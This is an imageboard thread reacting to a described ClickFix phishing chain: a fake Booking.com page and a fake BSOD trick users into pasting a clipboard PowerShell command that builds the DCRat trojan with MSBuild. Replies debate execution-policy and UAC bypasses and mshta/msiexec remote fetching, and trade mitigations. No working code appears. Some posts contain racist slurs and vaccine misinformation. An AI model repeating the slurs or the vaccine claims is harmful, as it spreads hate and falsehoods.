Do people really fall for this? Like college educated people with important shit on their computers?>An email arrives with subject "Reservation Cancellation." Sender appears to be Booking.com. The message mentions a refund over €1,000 and urges the recipient to click and review. Booking.com has been a popular target before, with similar campaigns in 2023 and 2024.>The link leads to a perfect clone of Booking.com with the correct colors, logos, and fonts. Indistinguishable from the real site.>Then a loading error appears. "Taking too long. Click to refresh." One click and the browser goes fullscreen.>A Blue Screen of Death fills the screen.>But Windows is not crashing. This is a webpage designed to look exactly like a system failure. The victim cannot easily escape.>Instructions appear: press Win+R, then CTRL+V, then Enter.>The malicious webpage runs JavaScript that silently copies the PowerShell command to the clipboard the moment you click. You never see it happen. When you press CTRL+V in the Run dialog, it's already there waiting.>The victim thinks they are fixing their computer. What they are actually doing is pasting a malicious PowerShell command that was silently copied to their clipboard.>The command downloads a project file and Windows' own MSBuild.exe compiles it into malware. This is called living off the land: using trusted system tools against the user.>The malware disables Windows Defender, adds exclusions, and establishes persistence. Then it injects the final payload into Windows process.>The payload is DCRat. A remote access trojan available since 2018. Price on underground forums: $5 for two months. $40 for lifetime access.>What DCRat can do: Keylogging Webcam access File theft Password extraction Remote desktop Drop additional malware
>>107793114yeah people fall for it ,one day my dad had an even more not subtle shit paint.ms "we're the police you need to pay"dad yell thank god he didn't click anything but if i wasn't there probably he would have.you can't blame them ,stop explorer.exe and people are more panicked than a kernel panicking.I would be glad to teach him basic computer litteracy but it's impressive how boomers are unwilling to learn if people are younger,they really got a big ego.
wouldn’t work on my computer even if I did fall for this, PS execution policy prevents this + UAC requires username and password every time for elevation. I also do not log in as an administrator but a standard user. The built-in admin account has also been renamed and its password scrambled + logon disabled.
>>107793114is this an add for dcrat or something?
>>107793114>Step codeshould be Stop code, and it isn't supposed to be monospace in a box. I think new versions of windows dont even use a stop code anymore, they use a string.>0x00000fVAlol>>107793173Boomers have no incoming information filter, they literally just believe everything that is said to them on TV, over the phone, and on the internet. NPC cattle
>>107793527>PS execution policy prevents thisIt doesn't. Execution policy is security theater and can be bypassed by using the Run dialog.Also you don't need admin permission to keylog and steal your passwords, so UAC is also security theater.The only prevention against malware is just to not open the fucking malware
>>107793114The only time boomers will actually follow the instructions on screen
>>107793114It's the most fundamental problem in computer securty. The users.You can have all the security features you want, if the user runs an unsandboxed malware payload themselves, they are simply fucked and nothing can help them here.
>>107793114About 10 years ago my mom fell for the old error messages send me apple cards scam on my computer of all things, luckily the retard must've been new cuz they didn't setup anything on my pc even after she gave them access to it.
>>107793557> and can be bypassed by using the Run dialognot on my machine learn how to configure.
>>107793645I don't need to learn how to configure. I just don't run random commands people put on the internet.I don't want any of that execution policy bullshit interfering with my own scripts, of which I have several to organize and rename files. I always set it to Unrestricted when I do a new OS install.
>>107793671So you’re retarded and just let anything run rather than signing your own scripts with your own certificate. Can’t wait until you get zero day’d LMAO
>>107793509kys
>>107793114>Do people really fall for this?Yes and anyone that does should lose their voting rights for life. If you are that fucking retarded you can't even reasonably be assumed to make decision for yourself never mind decisions that will affect other people.
>>107793114They do. T. work consumer tech support, they don't know it's just a malicious notification or even try pressing ctrl+alt+del
>>107793527You're literally the only person who runs their Windows in this configuration. Nobody does this. I know this because I did run a configuration like this in the past when I still used Windows and like 50% of Windows software was broken in some way.Clearly nobody who develops software for Windows even tests or thinks about this use case.
>>107793114A problem easily solved by removing india and the asias excluding korea/japan from the internet. I hate to victim blame but we really need to take some responsibility. We don't let children drink, why should we let uncivilized people on the internet?
>>107795228I hope you realize the primary target for these is Americans and British to a lesser extent.
>>107795712Good job missing the point entirely. We'll add you to the list as an honorary poop skin.
>>107795727Do you know what the word "victim" means? If you're scamming someone, you're not a victim of the person you're scamming.
>>107795742Bro please go back and read the original post you are embarrassing yourself.
>>107795773I did read the original post, that's the problem. You're relying on nobody (including yourself) reading it.We don't let children drink. Why? Because they don't know any better and become a victim of alcohol abuse.We don't let uncivilized people on the internet. Why? Because they become a victim of scams...? You said something completely retarded. A huge portion of scams is conducted by people located in EU and USA by the way. So even if I were to be charitable and interpret your post as "if we remove the browns from the Internet, scams will completely stop", you'd still be wrong and retarded.
>>107795801Bro please I am begging you, at this point it's just sad for both of us. Ask a teacher or a trusted adult for help in understand the post.
>>107795815No amount of begging is going to make me not notice how retarded you are, I'm afraid. No amount of reading your post again is going to change the fact that you've made a malformed post because your low IQ was unable to comprehend the words you were using in the context that you used them in.Maybe this is an ESL problem on your part, but I've seen Americans with English skills just as inadequate as yours.
>>107795841I'm sorry you're so upset about a post you didn't even understand. It's been fun playing with you though.
>>107795854Whatever helps you cope, retard. Maybe you should try learning English at a level you can actually communicate what you mean not what you think you mean but nobody else is gonna get lmao.
>>107795801Not letting your kid drink is actually what turns them into alcohol abusers because they're not exposed to it, don't understand it and see it as rebelling against parents, which then leads to degenerate behaviour with toxic peers leading to bad addictions in early adulthood. Every alchy/druggie I know had parents who were strict as fuck about it, and they all just went behind their backs and did it anyways without any kind of self control or reasonable amount. My parent's let my sister and I have a beer with pizza every now and then and neither one of us have substance abuse problems, probably because there was no novelty to it at all by the time our peers were doing it
>>107793114> about:config> full-screen-api.enabled = falseSolved with Firefox.
>>107795107Fucking MS setting the default user as an administrator role and now every windows software expects that as the norm.
>>107798405if you have mozilla trash willingly installed then you already skipped most of the steps in the op and went directly to exposing yourself as a retard
Microsoft allowing users to have access to the cmd screen is retarded anyway. Nobody needs this except for hackers.
>>107798405Interesting, is there a way to only allow it ons specific websites or only while a video is playing?>>107798511Ok, just do the same in chrome, dumb nigger
>>107793114*laughs in QubesOS*I am immune to these tricks
>>107793114*laughs in simplewall*Aaand that's why firewalls are important, folks.
>>107793114People are falling for this just as often as the fake captcha prompts asking users to do the same thing. When developers do it, their company ends up contracting Incident Response services. Sysadmins should just disable all users Win+R runbox shortcut through GPO at this point.
>>107800651You live in an era where videogame mods and fanart are subscription services. Do you really not expect malware to follow suit?
>>107793114I hate indians so much. Yea if you fall for it you were ignorant but keep in mind 95% of this shit is indian. We MUST segregate the internet from that shithole.
you all use mas already
>>107793527>execution policy Do people really believe this shit actually does anything? There is still Windows Script Host as hell.
>>107793685You realize you can trivially craft a script block and execute it right retard? You actually sign PowerShell scripts? Your sigs are probably bigger than your files. Jesus Christ.
>>107800651Saas is the most common way malware is deployed now, and vendor reputation is the only thing that stops the vendor from sniping clients victims (so yes it happens sometimes)
>>107793527In many instances, especially with fake captcha variants, it does not use powershell (it executes msiexec or mshta on a remote url) and runs the installer/MicrosoftHTML app with user privileges -> then launches an explorer session with the UAC skip parameter -> info stealer. Those protections do not apply.
Besides some severe shit like malware depending on devs being retarded and introducing backdoors via bugs (and you cannot prove whether it's intentional or if devs are really that fucking retarded), yes, malware can only abuse low IQs.Funny how folklore about vampires was all it took to explain everyone who wants to harm you by teaching some accountability for your own actions but suddenly now it's some le evil spook o algo.
lol darkcomet is still around?
>>107793114>Do people really fall for this? Like college educated people with important shit on their computers?where were you in 2021?people stood in line to inject themselves with literally untested science juice that was quickly and hastily produced in order to get immunized (they didn't) from the common cold,and then when they felt that a needle inside their hearts they just said "Concidence"so yes, people do fall for this kind of things, because people are fucking stupid
>>107804018>>>/pol/
>>107793114Why is it written like a retard?
>>107804120indians and russians, sometimes the french
>>107801478>UAC skip parameterdoes not work in AAM + enhanced UAC>>107795107Everything seems to work for me, even my gachaslop works fine (Zenless Zone Zero). If it doesn’t, right-click Run as Admin makes it work (though I am discretionary in what I give an admin token to. >>107800839https://www.f-secure.com/gb-en/articles/how-to-disable-windows-script-host
>>107793557Mind explaining how this malware can disable Defender without administrative privileges?
>>107793570underappreciated post thanks anon
>>107804247you don't need to disable defender to keylog, retard
>>107804247https://attack.mitre.org/techniques/T1548/002/Might have answered this myself based on another post in here.>>107804270Hey, be nice lol. The biggest part of the OP's attack chain was disabling Windows Defender so an ancient RAT can run without being quarantined right away. Why are you talking about keylogging?
>>107804299> If the UAC protection level of a computer is set to anything but the highest levelzzz zzz zzz zzz zzznot applicable to anyone tech literate. I thought this was a technology board?
Issue a fatwa against creating viruses so scammers go to hell.
>>107804299keylogging allows you to programatically obtain an administrator security token with which you could nuke defender from orbit, but that's irrelevant because keylogging gives you access to all valuable data going into the computer in the first place so you don't have to do any of that faggy infosec vulnerability chain shit
>>107793570this actually made me laugh and become depressed at the same time. How is it so fucking accurate?Boomers just seem naturally drawn to evil and bad decisions
>>107804322And how exactly will any of that be useful to you without the remote access that you need using a.. you know, Remote Access Trojan (RAT)?
uhhh, does ublock lite block any of this stuff?
>>107804040he's right though? Were you one of them anon? Have you had your accounts hacked and stolen too? Because in 30 years I still have yet to have 1 single account compromised in any contexts at all yet somehow the mouthbreathing retarded public manages to have this happen to them yearly.
does windows defender actually fucking do anything at all? All it does is wipe all my pirated games and has yet to catch a single actually malicious program. One time it jut straight up ignored a potential keylogger exe in a scan and i had to manually delete it. Good thing I never ran it but holy fuck this thing is useless
>>107804322Hello?!? Retard here.. retard with CISSP and 12 years security analyst experience here... hello?? >>107804329
>>107793114never give family members admin access.run your home like a business.
>>107793527>PS execution policy prevents thisIts security theater, there is a command line switch that outright bypasses that shit. You might know that, but normie X or normie Y definitely doesn't> UAC requires username and password every time for elevation.Normies will autopilot enter it/press OK(since the default is being a yes/no prompt instead of being asked for the password) just like the apt being a "Yes do as I say" away from nuking your system.
>>107798808Bumping this dead thread to check this terribly underrated post.How did simplewall suddenly disappear from this board's memory? If I remember correctly it was even removed from /g/'s wiki.
